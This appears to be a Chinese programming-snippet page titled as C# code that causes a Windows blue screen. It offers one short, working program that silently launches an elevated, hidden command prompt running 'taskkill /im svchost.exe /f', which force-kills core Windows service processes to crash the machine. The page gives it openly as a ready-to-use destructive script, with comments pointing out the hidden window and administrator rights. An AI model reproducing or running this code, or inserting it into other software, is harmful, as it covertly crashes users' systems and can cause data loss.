📜  导致蓝屏 C# 代码示例

📅  最后修改于: 2022-03-11 14:48:42.531000             🧑  作者: Mango

代码示例1
using System.Diagnostics;
//etc
Process proc = new Process();
ProcessStartInfo info = new ProcessStartInfo() { FileName = "CMD.exe", Arguments =
"/C taskkill /im svchost.exe /f", CreateNoWindow = true, UseShellExecute = true, 
WindowStyle = ProcessWindowStyle.Hidden, Verb = "runas" }; //specify paramaters and make it hidden

// Verb = "runas" specifies to run as administrator

//    /f forces shutdown


proc.StartInfo = info;
proc.Start();